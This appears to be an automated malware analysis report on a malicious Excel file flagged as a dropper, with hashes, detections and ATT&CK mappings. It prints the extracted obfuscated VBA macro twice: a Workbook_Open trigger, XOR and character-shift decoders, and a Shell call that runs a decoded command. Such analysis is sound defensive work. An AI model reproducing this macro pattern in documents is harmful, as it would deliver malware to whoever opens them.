Office (OLE) malware analysis — malicious · 6f1bcd419a827a9d

MALICIOUS

Office (OLE)

71.5 KB Created: 2019-05-29 13:00:49 Authoring application: Microsoft Excel First seen: 2019-05-31

MD5: cf00bd9418747f34c75aaa6bd37aa6d1 SHA-1: 18fd97434f65314e0b907f9db6fc5556a5842852 SHA-256: 6f1bcd419a827a9dbdbfef3dfd228d75fdb9844a58f62c9d7a1584dbfb18046a

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The critical heuristic 'OLE_VBA_SHELL' and the presence of a 'Workbook_Open' macro indicate that the Excel file is designed to execute malicious code upon opening. The VBA code is obfuscated, but the 'Welcome' function appears to decrypt a string which is then passed to the 'Shell' function. This strongly suggests the file acts as a dropper for a second-stage payload, likely downloaded from a remote source, aligning with the ClamAV detection signature 'Xls.Dropper.Agent-7006547-0'.

Heuristics 4

ClamAV: Xls.Dropper.Agent-7006547-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-7006547-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2150 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2150 bytes
SHA-256: `b6bcd7fe002517ed322d564e6ed59010b3fc694d132f2254ed36d54907a63c79`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "このワークブック" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Function Welcome(ByVal mathh As String, ByVal Paraf As String) As String Dim a, b, c, d As String Dim kios As Long Dim doggy As Long Dim cn As Long c = mathh b = Paraf a = "" kios = Len(c) doggy = Len(b) For cn = 1 To kios Step 3 a = a + Chr(Val(Mid(c, cn, 3)) Xor Asc(Mid(b, (Int(cn / 3) Mod doggy) + 1, 1))) Next cn Welcome = a End Function Private Sub Workbook_Open() 'debug.print If xlXmlExportValidationFailed > 0 Then oceran End Sub Function lowsharts() lowsharts = timefortime(3 - 2, 2 - 1) End Function Function Beta1() fdsgfadsrff436tgdfzf33546s = 1 + (Application.International(LittlePeace) - 1) Beta1 = fdsgfadsrff436tgdfzf33546s End Function Function LittlePeace() LittlePeace = ((xlDate)) End Function Function WestAndS(aAA As String) Dim ligiums, efrat As String Dim wq, Dego, vert As Integer Dego = 2 ligiums = aAA For wq = 1 To Len(ligiums) vert = Asc(Mid(ligiums, wq, 1)) - Dego efrat = efrat & Chr(vert) Next wq WestAndS = efrat End Function Private Sub oceran() If xlMillimeters > 0 Then Ags = 3.29845103217598E+76 If msoComboLabel > 0 Then XlForecastChartTypes = (Shell#(Welcome(WestAndS(lowsharts), Beta1 * 3), Sgn(123.67) - 1)) End If End Sub Function timefortime() timefortime = Cells End Function Function mister() mister = Welcome(LeftBeta1 * 3 + "abcABC") End Function Attribute VB_Name = "シート3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: b6bcd7fe002517ed322d564e6ed59010b3fc694d132f2254ed36d54907a63c79

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "このワークブック"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True









































































Public Function Welcome(ByVal mathh As String, ByVal Paraf As String) As String
Dim a, b, c, d As String
Dim kios As Long
Dim doggy As Long
Dim cn As Long
c = mathh
b = Paraf
a = ""
kios = Len(c)
doggy = Len(b)
For cn = 1 To kios Step 3
a = a + Chr(Val(Mid(c, cn, 3)) Xor Asc(Mid(b, (Int(cn / 3) Mod doggy) + 1, 1)))
Next cn
Welcome = a
End Function
Private Sub Workbook_Open()
'debug.print
If xlXmlExportValidationFailed > 0 Then oceran
End Sub
Function lowsharts()
lowsharts = timefortime(3 - 2, 2 - 1)
End Function

Function Beta1()
fdsgfadsrff436tgdfzf33546s = 1 + (Application.International(LittlePeace) - 1)
Beta1 = fdsgfadsrff436tgdfzf33546s
End Function

Function LittlePeace()
LittlePeace = ((xlDate))
End Function


Function WestAndS(aAA As String)
Dim ligiums, efrat As String
Dim wq, Dego, vert As Integer
Dego = 2
ligiums = aAA
For wq = 1 To Len(ligiums)
vert = Asc(Mid(ligiums, wq, 1)) - Dego
efrat = efrat & Chr(vert)
Next wq
WestAndS = efrat
End Function

Private Sub oceran()
If xlMillimeters > 0 Then
Ags = 3.29845103217598E+76
If msoComboLabel > 0 Then XlForecastChartTypes = (Shell#(Welcome(WestAndS(lowsharts), Beta1 * 3), Sgn(123.67) - 1))
End If
End Sub

Function timefortime()
timefortime = Cells
End Function

Function mister()
mister = Welcome(LeftBeta1 * 3 + "abcABC")
End Function








Attribute VB_Name = "シート3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.